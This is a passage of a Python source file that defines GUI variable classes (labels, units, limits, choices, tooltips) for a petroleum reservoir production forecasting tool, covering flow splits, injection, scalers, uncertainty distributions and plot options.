        self._tooltip = 'Injection gas is fed in from the previous node.'
class InjectionWaterInflow(Variable):
    """Boolean flag: injection water is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injection Water'
        self._pytype = bool
        self._tooltip = 'Injection water is fed in from the previous node.'
# ======================================================================================================================
# Flow Split Variables
# ======================================================================================================================
class SplitType(Variable):
    """Selector for how phases are split between two downstream nodes."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Split type'
        self._choices = ('', 'Fixed', 'Multiphasic spill-over', 'Monophasic spill-over', 'Production to injection')
        self._choice_images = (None, ico.oil_cum_16x16, ico.fluids_16x16, ico.liquid_cum_16x16, ico.fluids_injection_16x16)
        self._tooltip = 'Defines the split-type used in determining\n' \
                        'how the phases are split.\n' \
                        '- Fixed: Sends phases to the two nodes based on the fractions given below.\n' \
                        '- Multiphasic:...'
        self._pytype = tuple
class OilSplit(Variable):
    """Oil split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Oil split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Oil split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class GasSplit(Variable):
    """Gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class WaterSplit(Variable):
    """Water split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Water split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Water split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class LiftGasSplit(Variable):
    """Lift-gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Lift-gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Lift-gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class InjectionGasSplit(Variable):
    """Injection-gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Injection gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Injection gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class InjectionWaterSplit(Variable):
    """Injection-water split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Injection water split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Injection water split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
# ======================================================================================================================
# Surface Variables
# ======================================================================================================================
class FacilityVariable(Variable):
    """Base for surface-facility variables: non-negative, typed 'facilities'."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'facilities'
class TargetGasLiquidRatio(FacilityVariable):
    """Target total gas-liquid ratio used to calculate lift-gas requirements."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._frame_label = 'Target TGLR'
        self._menu_label = 'Target gas-liquid ratio'
        self._image = ico.total_gas_liquid_ratio_16x16
        self._plot_label = r'Target Gas-Liquid Rate'
        self._legend = r'Target TGLR.'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Target total gas-liquid-ration used for\n' \
                        'calculating lift-gas requirements.'
        self._id = 'tglr'
class Availability(FacilityVariable):
    """Availability fraction applied to production rates and constraints."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._frame_label = 'Availability'
        self._menu_label = 'Availability'
        self._image = ico.average_uptime_16x16
        self._plot_label = r'Availability'
        self._legend = r'Availability'
        self._round_off = 3
        self._pytype = float
        self._tooltip = 'Availability applied to production rates and constraints.\n' \
                        'Individual entity availability not used in simulation, but\n' \
                        'kept for export to Phaser. Availability listed in History and Prediction is used\n' \
                        'as an over-all system availability.'
        self._id = 'availability'
class WAGCycleDuration(FacilityVariable):
    """Duration (days) between each WAG gas/water injection change-over."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit('days')
        self._frame_label = 'Cycle dur.'
        self._menu_label = 'WAG cycle duration'
        self._image = ico.wag_cycle_duration_16x16
        self._plot_label = r'WAG Cycle Duration'
        self._legend = r'WAG Cycle'
        self._pytype = int
        self._tooltip = 'Duration between each change-over from\n' \
                        'gas to water injection'
        self._id = 'wag_cycle'
class WAGCycles(FacilityVariable):
    """Maximum number of WAG change-overs (starting with gas, ending with water)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._frame_label = '# of cycles'
        self._menu_label = 'WAG cycles'
        self._image = ico.wag_cycles_16x16
        self._plot_label = r'Number of WAG Cycles'
        self._legend = r'WAG Cycles'
        self._pytype = int
        self._tooltip = 'Maximum number of change-overs from\n' \
                        'gas to water injection. Starting with\n' \
                        'gas and ending with water'
        self._id = 'wag_cycles'
class TargetVoidageRatio(FacilityVariable):
    """Target voidage replacement ratio; spreadsheet assigns proportions per producer."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = ReservoirVolumeRatio(unit_system)
        self._frame_label = 'Target ratio'
        self._menu_label = 'Target voidage ratio'
        self._image = ico.wag_voidage_replacement_16x16
        self._plot_label = r'Target Voidage Replacement Ratio'
        self._legend = r'Target Voidage Ratio'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Target voidage replacement ratio:\n' \
                        '- Spreadsheet: Assign proportion of injection\n' \
                        '  going to each supported producer'
        self._id = 'voidage'
class VoidageProportion(FacilityVariable):
    """Per-producer voidage proportion shown on the VoidagePanel."""
    # used exclusively on the VoidagePanel in PropertyPanels. TargetVoidageRatio handles menu and plotting
    def __init__(self, unit_system):
        super().__init__()
        self._unit = ReservoirVolumeRatio(unit_system)
        self._frame_label = 'Target ratio'
        self._image = ico.spreadsheet_16x16
        self._round_off = 2
        self._pytype = float
class GasInjectionPotentialConstant(FacilityVariable):
    """Optional constant gas-injection potential for a well.

    When unset, the required potential is calculated from voidage replacement
    (per the tooltip shown to the user).
    """
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas inj.'
        self._menu_label = 'Constant gas inj.'
        self._image = ico.gas_injection_rate_16x16
        self._limits = (0., None)
        self._plot_label = r'Constant gas injection'
        self._legend = r'Con. gas inj.'
        self._tooltip = 'Set to provide a constant gas injection potential\n' \
                        'for the well. If this is not set, the required\n' \
                        'potential will be calculated based on voidage replacement.'
        self._pytype = float
        # Bug fix: was misspelled '_round_of', which only created an unused
        # attribute and left the intended rounding precision unset.
        self._round_off = 1
        self._id = 'constant_gas_inj'
class WaterInjectionPotentialConstant(FacilityVariable):
    """Optional constant water-injection potential for a well.

    When unset, the required potential is calculated from voidage replacement
    (per the tooltip shown to the user).
    """
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water inj.'
        self._menu_label = 'Constant water inj.'
        self._image = ico.water_injection_rate_16x16
        self._limits = (0., None)
        self._plot_label = r'Constant water injection'
        self._legend = r'Con. water inj.'
        self._tooltip = 'Set to provide a constant water injection potential\n' \
                        'for the well. If this is not set, the required\n' \
                        'potential will be calculated based on voidage replacement.'
        self._pytype = float
        # Bug fix: was misspelled '_round_of', which only created an unused
        # attribute and left the intended rounding precision unset.
        self._round_off = 1
        self._id = 'constant_water_inj'
# ======================================================================================================================
# Auxiliary Variables
# ======================================================================================================================
class Name(Variable):
    """Entity name (free-form string)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Name'
        self._pytype = str
        self._id = 'name'
class ScalerEvaluation(Variable):
    """Mathematical expression transforming static parameters into scaling parameters."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Evaluation'
        self._image = ico.right_arrow_16x16
        self._pytype = str
        self._tooltip = 'Mathematical expression used to transform\n' \
                        'static parameters into scaling parameters.'
class SummaryEvaluation(Variable):
    """Mathematical expression producing a multiplier to the production profile."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Multiplier'
        self._image = ico.right_arrow_16x16
        self._pytype = str
        self._tooltip = 'Mathematical expression used to calculate\n' \
                        'multiplier to the production profile.'
class IncludeModel(Variable):
    """Boolean flag: include this model."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Include model'
        self._pytype = bool
class MergeType(Variable):
    """Selector for merge behaviour: Smooth or Conditional."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Merge type'
        self._choices = ('', 'Smooth', 'Conditional')
        self._choice_images = (None, ico.merge_16x16, ico.merge_16x16)
        self._pytype = tuple
class MergePoint(Variable):
    """Merge point; per-choice labels for x- and y-axis merge positions."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'Merge at (x-axis)', 'Merge at (y-axis)')
        self._round_off = 2
        self._pytype = float
class MergeRate(Variable):
    """Merge rate (only meaningful for the second merge-type choice)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'Merge rate', None)
        self._round_off = 5
        self._pytype = float
class Multiplier(Variable):
    """Scalar multiplier (float, 1 decimal)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Multiplier'
        self._round_off = 1
        self._pytype = float
class Addition(Variable):
    """Scalar addition term (float, 1 decimal)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Addition'
        self._round_off = 1
        self._pytype = float
class RunFrom(Variable):
    """Selector for run start: first point, last point or a specific value."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Run from'
        self._choices = (None, 'First point', 'Last point', 'Specific')
        self._choice_images = (None, ico.first_point_16x16, ico.last_point_16x16, ico.specific_point_16x16)
        self._pytype = tuple
class RunFromSpecific(Variable):
    """Axis selector (x or y) used with RunFrom = 'Specific'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Axis'
        self._choices = (None, 'x-axis', 'y-axis')
        self._choice_images = (None, ico.x_axis_16x16, ico.y_axis_16x16)
        self._pytype = tuple
class RunFromValue(Variable):
    """Non-negative value used with RunFrom = 'Specific'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Value'
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
class RunTo(Variable):
    """x-axis value at which the run ends."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Run to (x-axis)'
        self._image = ico.run_16x16
        self._round_off = 1
        self._pytype = float
class Frequency(Variable):
    """Time-step frequency selector: Yearly, Quarterly, Monthly or Delta."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Frequency'
        self._choices = ('Yearly', 'Quarterly', 'Monthly', 'Delta')
        self._choice_images = (ico.dates_year_16x16, ico.dates_quarter_16x16, ico.dates_16x16, ico.timestep_16x16)
        self._pytype = tuple
class TimeDelta(Variable):
    """Days per time-step; only meaningful for the 'Delta' frequency choice."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, TimeUnit('days'))
        self._frame_label = (None, None, None, 'Delta')
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Number of days for each time-step.'
class TimeStep(Variable):
    """Days per time-step (stand-alone, not per-choice)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit('days')
        self._frame_label = 'Time-step'
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Number of days for each time-step.'
class SaveAllSamples(Variable):
    """Boolean flag: retain every sampled run (enables shading/histograms, larger files)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Save all samples'
        self._pytype = bool
        self._tooltip = 'Save all the sampled runs. This allows for\n' \
                        '- Display distribution shading in Cartesian charts\n' \
                        '- Display Histograms of summary variables\n' \
                        'Saved file size is substantially larger.'
class SimulateConstrainted(Variable):
    """Boolean flag: simulate with voidage-replacement and surface-network constraints.

    NOTE(review): class name appears to be a typo for 'SimulateConstrained';
    kept unchanged because callers may reference this name.
    """
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Simulate with constraints'
        self._pytype = bool
        self._tooltip = 'Simulate using voidage replacement\n' \
                        'assumptions and surface network constraints.\n' \
                        'Rates will be based on the choke position and\n' \
                        'potentials will become instantaneous potentials.'
class Samples(Variable):
    """Number of stochastic samples to run."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._frame_label = '# of samples'
        self._plot_label = 'Samples'
        self._limits = (0., None)
        self._pytype = int
        self._tooltip = 'Number of stochastic samples to run.'
# ======================================================================================================================
# Scenario and Event Variables
# ======================================================================================================================
class StartDate(Variable):
    """Start date of prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Start'
        self._pytype = date
        self._tooltip = 'Start date of prediction'
class EndDate(Variable):
    """End date of prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'End'
        self._pytype = date
        self._tooltip = 'End date of prediction'
class EventTrigger(Variable):
    """Selector for what triggers an event: Scenario or Date."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Trigger'
        self._choices = ('Scenario', 'Date')
        self._choice_images = (ico.scenario_16x16, ico.event_16x16)
        self._pytype = tuple
class EventDate(Variable):
    """Event date; only meaningful for the 'Date' trigger choice."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, 'Date')
        self._pytype = date
class OffsetYears(Variable):
    """Offset in years; only meaningful for the 'Scenario' trigger choice."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (TimeUnit('years'), None)
        self._frame_label = ('Offset', None)
        self._round_off = 2
        self._pytype = float
# ======================================================================================================================
# Uncertainty Variables
# ======================================================================================================================
class UncertainValue(Variable):
    """Deterministic value used as the basis for uncertainty sampling."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Value'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Deterministic value used for sampling.'
class Distribution(Variable):
    """Probability distribution choice used when sampling the uncertainty space."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Distribution'
        # Consistency fix: every other Variable stores _choices as a tuple
        # (and _pytype is tuple); this one used a list.
        self._choices = ('', 'Swanson', 'Uniform', 'Triangular', 'Normal', 'Lognormal')
        self._choice_images = (None, ico.swanson_distribution_16x16, ico.uniform_distribution_16x16,
                               ico.triangular_distribution_16x16, ico.normal_distribution_16x16,
                               ico.lognormal_distribution_16x16)
        self._pytype = tuple
        self._tooltip = 'Probability distribution used for sampling\n' \
                        'of the properties uncertainty space.'
class DistributionParameter1(Variable):
    """First distribution parameter (per-choice): Min or Mean, as +/- % of Value."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', '+/-%', '+/-%', '+/-%', '+/-%')
        self._frame_label = (None, 'Min', 'Min', 'Min', 'Mean', 'Mean')
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
class DistributionParameter2(Variable):
    """Second distribution parameter (per-choice): Mode/Max/St. dev., as % of Value."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', '+/-%', '+/-%', '+% of mean', '+% of mean')
        self._frame_label = (None, 'Mode', 'Max', 'Mode', 'St. dev.', 'St. dev.')
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
class DistributionParameter3(Variable):
    """Third distribution parameter (per-choice): Max, as +/- % of Value."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', None, '+/-%', None, None)
        self._frame_label = (None, 'Max', None, 'Max', None, None)
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
# ======================================================================================================================
# Analogue Function Variables
# ======================================================================================================================
class PlaceholderMethod(Variable):
    """Placeholder method selector with five empty choice slots."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        # Bug fix: ('' * 5) evaluates to the empty string '', not a tuple.
        # ('',) * 5 yields the intended 5-element tuple of empty labels.
        self._choices = ('',) * 5
        self._choice_images = (None,)
        self._pytype = tuple
class PlaceholderInput(Variable):
    """Placeholder input variable with five empty per-choice frame labels."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        # Bug fix: ('' * 5) is the string '', not a tuple; per-choice labels
        # elsewhere are tuples, so build the intended 5-element tuple.
        self._frame_label = ('',) * 5
        self._pytype = int
class PlaceholderParameter1(Variable):
    """Placeholder first parameter with five empty per-choice frame labels."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        # Bug fix: ('' * 5) is the string '', not a tuple; per-choice labels
        # elsewhere are tuples, so build the intended 5-element tuple.
        self._frame_label = ('',) * 5
        self._pytype = int
class PlaceholderParameter2(Variable):
    """Placeholder second parameter with five empty per-choice frame labels."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        # Bug fix: ('' * 5) is the string '', not a tuple; per-choice labels
        # elsewhere are tuples, so build the intended 5-element tuple.
        self._frame_label = ('',) * 5
        self._pytype = int
class PlaceholderParameter3(Variable):
    """Placeholder third parameter with five empty per-choice frame labels."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        # Bug fix: ('' * 5) is the string '', not a tuple; per-choice labels
        # elsewhere are tuples, so build the intended 5-element tuple.
        self._frame_label = ('',) * 5
        self._pytype = int
class HistoryMethod(Variable):
    """Fit-method selector for history-based functions: History or Moving average."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('History', 'Moving average')
        self._choice_images = (ico.history_fit_16x16, ico.moving_average_fit_16x16)
        self._pytype = tuple
class HistoryInput(Variable):
    """Input for history methods; 'n' is only used by Moving average."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, 'n')
        self._pytype = int
class HistoryParameter1(Variable):
    """First (unused) parameter slot for history methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class HistoryParameter2(Variable):
    """Second (unused) parameter slot for history methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class HistoryParameter3(Variable):
    """Third (unused) parameter slot for history methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class CurvefitMethod(Variable):
    """Curve-fit method selector: Constant, Linear, Exponential, Power or Logarithmic."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Constant', 'Linear', 'Exponential', 'Power', 'Logarithmic')
        self._choice_images = (ico.constant_fit_16x16, ico.linear_fit_16x16, ico.exponential_fit_16x16, ico.power_fit_16x16, ico.logarithmic_fit_16x16)
        self._pytype = tuple
class CurvefitInput(Variable):
    """Input slot for curve-fit methods (no per-choice labels)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, None, None, None, None)
        self._pytype = int
class CurvefitParameter1(Variable):
    """First curve-fit parameter: the constant, or coefficient 'a'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = ('con.', 'a', 'a', 'a', 'a')
        self._round_off = 3
        self._pytype = float
class CurvefitParameter2(Variable):
    """Second curve-fit parameter: coefficient 'b' (unused for Constant)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, 'b', 'b', 'b', 'b')
        self._round_off = 2
        self._pytype = float
class CurvefitParameter3(Variable):
    """Third curve-fit parameter: coefficient 'c' (Exponential and Power only)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, None, 'c', 'c', None)
        self._round_off = 2
        self._pytype = float
class NonParametricMethod(Variable):
    """Non-parametric method selector (currently only Bow-wave)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Bow-wave',)
        self._choice_images = (ico.bow_wave_16x16,)
        self._pytype = tuple
class NonParametricInput(Variable):
    """'Mid' input value for the non-parametric method."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = ('Mid',)
        self._round_off = 2
        self._pytype = float
class NonParametricParameter1(Variable):
    """First (unused) parameter slot for the non-parametric method."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class NonParametricParameter2(Variable):
    """Second (unused) parameter slot for the non-parametric method."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class NonParametricParameter3(Variable):
    """Third (unused) parameter slot for the non-parametric method."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class DCAMethod(Variable):
    """Decline-curve-analysis method selector: Exponential, Hyperbolic or Harmonic."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Exponential', 'Hyperbolic', 'Harmonic')
        self._choice_images = (ico.exponential_dca_16x16, ico.hyperbolic_dca_16x16, ico.harmonic_dca_16x16)
        self._pytype = tuple
class DCAInput(Variable):
    """DCA input: 'b' exponent (Hyperbolic choice only)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'b', None)
        self._round_off = 2
        self._pytype = float
class DCAParameter1(Variable):
    """First DCA parameter: initial rate 'q' (all choices)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = ('q', 'q', 'q')
        self._round_off = 2
        self._pytype = float
class DCAParameter2(Variable):
    """Second DCA parameter: decline rate 'D' (all choices)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = ('D', 'D', 'D')
        self._round_off = 5
        self._pytype = float
class DCAParameter3(Variable):
    """Third (unused) parameter slot for DCA methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, None, None)
        self._pytype = int
# ======================================================================================================================
# Scaling Variables
# ======================================================================================================================
class ScalerVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
self._type = 'scalers'
class CumulativeScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Cum'
self._menu_label = 'Cumulative'
self._image = ico.cum_scaler_16x16
self._plot_label = r'Cumulative Scaler, $S_{cum}$'
self._legend = r'$S_{cum}$'
self._id = 's_cum'
class RateScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Rate'
self._menu_label = 'Rate'
self._image = ico.rate_scaler_16x16
self._plot_label = r'Rate Scaler, $S_{rate}$'
self._legend = r'$S_{rate}$'
self._id = 's_rate'
class FFWScaler(ScalerVariable):
    """Unitless scaler for the fractional flow of water (id 's_ffw')."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._id = 's_ffw'
        self._unit = Unitless()
        self._image = ico.ffw_scaler_16x16
        self._frame_label = 'FFW'
        self._menu_label = 'FFW'
        self._plot_label = r'Fractional Flow of Water Scaler, $S_{ffw}$'
        self._legend = r'$S_{ffw}$'
class FFGScaler(ScalerVariable):
    """Unitless scaler for the fractional flow of gas (id 's_ffg')."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._id = 's_ffg'
        self._unit = Unitless()
        self._image = ico.ffg_scaler_16x16
        self._frame_label = 'FFG'
        self._menu_label = 'FFG'
        self._plot_label = r'Fractional Flow of Gas Scaler, $S_{ffg}$'
        self._legend = r'$S_{ffg}$'
class OnsetScaler(ScalerVariable):
    """Fractional-flow onset scaler, expressed in years (id 'onset')."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._id = 'onset'
        self._unit = TimeUnit('years')
        self._image = ico.time_16x16  # TODO: draw a dedicated onset icon
        self._frame_label = 'Onset'
        self._menu_label = 'Onset'
        self._plot_label = r'Fractional Flow Onset, $\Delta$'
        self._legend = r'Onset'
class InitialWCTScaler(Variable):
    """Initial water-cut scaler: a percentage bounded to [0, 100] (id 'wct_ini')."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._id = 'wct_ini'
        self._type = 'scalers'
        # NOTE(review): limits are floats while _pytype is int -- confirm intended.
        self._pytype = int
        self._limits = (0., 100.)
        self._unit = PercentageUnit()
        self._image = ico.wct_ini_scaler_16x16
        self._frame_label = 'Ini. WCT'
        self._menu_label = 'Initial WCT'
        self._plot_label = r'Initial Water-cut'
        self._legend = r'Ini. WCT'
class ScalerSelection(Variable):
    """Drop-down selection between the four scaler kinds."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Scaler'
        self._choices = ('Cumulative', 'Rate', 'FFW', 'FFG')
        self._choice_images = (ico.cum_scaler_16x16, ico.rate_scaler_16x16,
                               ico.ffw_scaler_16x16, ico.ffg_scaler_16x16)
# ======================================================================================================================
# Selection of possible static parameters used as input to scaling laws
# ======================================================================================================================
class StaticVariable(Variable):
    """Common base for static inputs to scaling laws: non-negative floats of type 'statics'."""

    def __init__(self):
        super().__init__()
        self._type = 'statics'
        self._pytype = float
        self._round_off = 1
        self._limits = (0., None)
class CompletedLength(StaticVariable):
    """Completed well length, in the active unit system's length unit (id 'length')."""

    def __init__(self, unit_system):
        super().__init__()
        self._id = 'length'
        self._unit = LengthUnit(unit_system)
        self._image = ico.completion_16x16
        self._frame_label = 'Well length'
        self._menu_label = 'Well length'
        self._plot_label = r'Well Length'
        self._legend = r'Well length'
class HydrocarbonFeet(StaticVariable):
    """Hydrocarbon feet (HCFT), expressed in the unit system's area unit (id 'hcft')."""

    def __init__(self, unit_system):
        super().__init__()
        self._id = 'hcft'
        self._unit = AreaUnit(unit_system)
        self._image = ico.HCFT_16x16
        self._frame_label = 'HCFT'
        self._menu_label = 'HCFT'
        self._plot_label = r'HCFT'
        self._legend = r'HCFT'
class HydrocarbonPoreVolume(StaticVariable):
    """Hydrocarbon pore volume (HCPV), in the unit system's volume unit (id 'hcpv')."""

    def __init__(self, unit_system):
        super().__init__()
        self._id = 'hcpv'
        self._unit = VolumeUnit(unit_system)
        self._image = ico.HCPV_16x16
        self._frame_label = 'HCPV'
        self._menu_label = 'HCPV'
        self._plot_label = r'HCPV'
        self._legend = r'HCPV'
class Permeability(StaticVariable):
    """Reservoir permeability (id 'permeability'); its unit is system-independent."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._id = 'permeability'
        self._unit = PermeabilityUnit()
        self._image = ico.permeability_16x16
        self._frame_label = 'Permeability'
        self._menu_label = 'Permeability'
        self._plot_label = r'Permeability'
        self._legend = r'Permeability'
class OilDensity(StaticVariable):
    """Oil density, in the unit system's density unit (id 'oil_density')."""

    def __init__(self, unit_system):
        super().__init__()
        self._id = 'oil_density'
        self._unit = DensityUnit(unit_system)
        self._image = ico.stoiip_16x16
        self._frame_label = 'Oil density'
        self._menu_label = 'Oil density'
        self._plot_label = r'Oil density, $\rho_o$'
        self._legend = r'$\rho_o$'
# ======================================================================================================================
# Plot Option Variables
# ======================================================================================================================
class ShowData(Variable):
    """Yes/No toggle controlling whether measured data is shown on plots."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Show data'
        self._choices = ('No', 'Yes')
        self._choice_images = (None, ico.history_match_16x16)
class ShowUncertainty(Variable):
    """Yes/No toggle controlling whether uncertainty bands are shown on plots."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Show uncertainty'
        self._choices = ('No', 'Yes')
        self._choice_images = (ico.mid_chart_16x16, ico.prediction_16x16)
class SplitBy(Variable):
    """Choice of how plots are split into separate panels."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Split by'
        self._choices = ('None', 'Entity', 'Simulation', 'Variable')
        self._choice_images = (None, ico.folder_closed_16x16,
                               ico.project_16x16, ico.grid_properties_16x16)
class GroupBy(Variable):
    """Choice of how plotted series are grouped."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Group by'
        self._choices = ('None', 'Unit')
        self._choice_images = (None,) * 2
class ColourBy(Variable):
    """Choice of how plotted series are coloured."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = tuple
        self._frame_label = 'Colour by'
        self._choices = ('None', 'Entity type')  # TODO: Not yet correct
        self._choice_images = (None,) * 2
# ======================================================================================================================
# Variable plotting option variables (used on frames)
# ======================================================================================================================
class VariableColour(Variable):
    """Colour picker for a plotted line; value is a wx.Colour."""

    def __init__(self, unit_system=None):
        super().__init__()
        self._pytype = wx.Colour
        self._frame_label = 'Colour'
        self._tooltip = 'Select colour of line to display in cartesian charts.'
